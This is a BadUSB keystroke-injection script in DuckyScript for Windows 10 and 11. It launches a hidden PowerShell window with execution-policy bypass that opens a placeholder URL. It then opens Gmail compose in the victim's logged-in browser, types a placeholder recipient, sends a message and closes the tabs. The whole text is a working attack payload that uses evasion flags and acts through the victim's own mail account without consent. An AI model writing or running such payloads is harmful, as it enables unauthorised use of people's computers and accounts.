REM     Title: send email

REM     Author: findirfin

REM     Description: opens gmail and sends email

REM     Target: Windows 10, 11

REM     -----------------------------------------------------------------------------
REM     
REM     -----------------------------------------------------------------------------

DELAY 2000
GUI r
DELAY 500
REM                               
STRING powershell -w h -NoP -NonI -Exec Bypass Start-Process "https://h.a?c=k"
ENTER
DELAY 8000
CTRL T
DELAY 200
STRING https://mail.google.com/mail/u/0/#inbox?compose=new
ENTER
DELAY 10000
STRING to-address-here
DELAY 300
TAB
TAB
STRING test
DELAY 200
CTRL ENTER
DELAY 500
CTRL W
DELAY 200
ENTER
DELAY 200
ENTER
CTRL W
DELAY 200